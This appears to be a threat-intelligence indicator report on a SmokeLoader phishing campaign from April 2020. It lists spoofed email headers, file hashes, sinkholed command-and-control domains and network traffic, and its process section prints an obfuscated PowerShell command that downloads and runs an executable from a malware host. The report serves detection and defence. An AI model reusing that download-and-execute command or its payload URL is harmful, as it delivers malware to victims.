- #IOC #OptiData #VR #smokeloader #LZH #WSH #vmdetect
- https://pastebin.com/EagNZxKf
- previous_contact:
- https://pastebin.com/QpG70u8T
- https://pastebin.com/BJzcXqkK
- https://pastebin.com/kBW7nkZ5
- https://pastebin.com/Z7zq0YkW
- https://pastebin.com/b8PkhMyN
- https://pastebin.com/hkskwKvc
- https://pastebin.com/JmthzrL4
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- https://research.checkpoint.com/2019-resurgence-of-smokeloader/
- attack_vector
- --------------
- email attachment .RAR (LHa/LZH) > JS > WSH > PowerShell > GET 1URL > exe
- email_headers
- --------------
- Received: from hosting.wildpark.net (hosting.wildpark.net [217.77.208.228])
- Received: from [127.0.0.1] (unknown [148.251.234.93])
- by hosting.wildpark.net (Postfix) with ESMTPA id 7C920200037A
- Reply-To: gpnotorg@protonmail.com
- From: dpssmykolayiv@dpssmk.gov.ua
- Subject: Re: Задержка по оплате
- Message-Id: <1BA02550-FD75-EE8F-008E-A3B99C8754AE@dpssmk.gov.ua>
- Date: Tue, 7 Apr 2020 05:10:22 +0300
- X-Mailer: iPhone Mail (13E238)
- X-FEAS-CLIENT-IP: 217.77.208.228
- Return-Path: dpssmykolayiv@dpssmk.gov.ua
- files
- --------------
- SHA-256 9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e
- File name План від 05.04.2020р.rar [ LHa (2.x)/LHark archive data [lh7] - header level 0 ]
- File size 6.69 KB (6852 bytes)
- SHA-256 cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854
- File name pax_05.04.2020à..js [ JavaScript ]
- File size 19.80 KB (20278 bytes)
- SHA-256 4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b
- File name poppy.exe [PE32 executable for MS Windows (GUI) Intel 80386 32-bit]
- File size 147.00 KB (150528 bytes)
- SHA-256 8d16d5caad71aaaaa1479f8477d2928b66581c79932a49a21edf93db2803ab9c
- File name 9419.tmp (ntdll.dll) [clean, dropped to %temp%, Microsoft Visual C++ vx.x DLL ]
- File size 1.23 MB (1292192 bytes)
- activity
- **************
- PL_SCR http://scproducts7.ru/availableupdatemanager/poppy.exe
- C2 amfibiyapolyakova{.} com - thanks to @JAMESWT_MHT
- amfibiyapolyakova{.} com - sinkholed (CyS Centrum)
- siciliyaopartion{.} ru - sinkholed (CyS Centrum)
- opetileon{.} ru - sinkholed (CyS Centrum)
- crocopexpire{.} ug - sinkholed (CyS Centrum)
- yamaha{.} ug - sinkholed (CyS Centrum)
- informatioshopname{.} ru - thanks to CyS Centrum
- netwrk
- --------------
- [http]
- 8.208.91.58 scproducts7.ru GET /availableupdatemanager/poppy.exe HTTP/1.1 Google Chrome
- (!) !This program cannot be run in DOS mode.
- 185.14.31.88 amfibiyapolyakova.com POST / HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/5.0
- [ssl]
- 204.79.197.200 www.bing.com Client Hello
- comp
- --------------
- powershell.exe 8.208.91.58 scproducts7.ru
- explorer.exe 185.14.31.88 amfibiyapolyakova.com
- proc
- --------------
- C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_05.04.2020à..js
- C:\Windows\System32\cmd.exe" /c iwbDyExnfhFHuWV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','%temp%WHk58.exe'); & %temp%WHk58.exe & CXorbhFlHAGsKcP
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','C:\tmpWHk58.exe');
- C:\tmpWHk58.exe
- persist
- --------------
- n/a
- drop
- --------------
- C:\tmpWHk58.exe
- %temp%\9419.tmp
- %temp%\se3mut05.g01.ps1
- %temp%\nsfka0oj.3qd.psm1
- C:\Users\operator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- # # #
- https://www.virustotal.com/gui/file/9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e/details
- https://www.virustotal.com/gui/file/cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854/details
- https://www.virustotal.com/gui/file/4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b/details
- https://analyze.intezer.com/#/analyses/2ad8aa89-9449-4ea1-80d3-e2513c1ff7f6
- VR
- @